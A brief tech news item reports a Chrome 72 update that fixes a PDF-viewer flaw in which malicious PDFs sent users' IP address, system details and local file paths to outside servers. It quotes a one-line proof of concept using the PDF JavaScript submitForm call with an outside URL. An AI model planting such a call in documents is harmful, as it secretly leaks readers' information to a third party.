Google Chrome 72.0.3626.121 releases: Fix leaked PDF component leaks

by ·

The Google Chrome team has released version v72.0.3626.121 to all official users, which is the third maintenance release since the last official release. There are no new features and improvements in this update, mainly to fix known issues. The problem with this fix is the leaked PDF component leaks.

Previously, researchers found that there are vulnerabilities in the PDF components built into Google Chrome. When malicious documents are executed, information is sent to two unknown servers. This vulnerability in Chrome that opens the pdf file can leak the user’s information. The successful exploitation of the vulnerability could cause the target user’s an IP address and other information to be leaked.

“The root is the “this.submitForm()” PDF Javascript API. We tested it with a minimal PoC, a simple API call like “this.submitForm(‘http://google.com/test’)” will make Google Chrome send the personal information to google.com.”

 Information that may be leaked includes:

  • The public IP address of the user.
  • The operating system, Chrome version, etc. (in the HTTP POST header).
  • The full path to the PDF file on the user’s computer (in the HTTP POST payload).

You should update your Chrome browser to the latest version to fix this flaw.

Tags: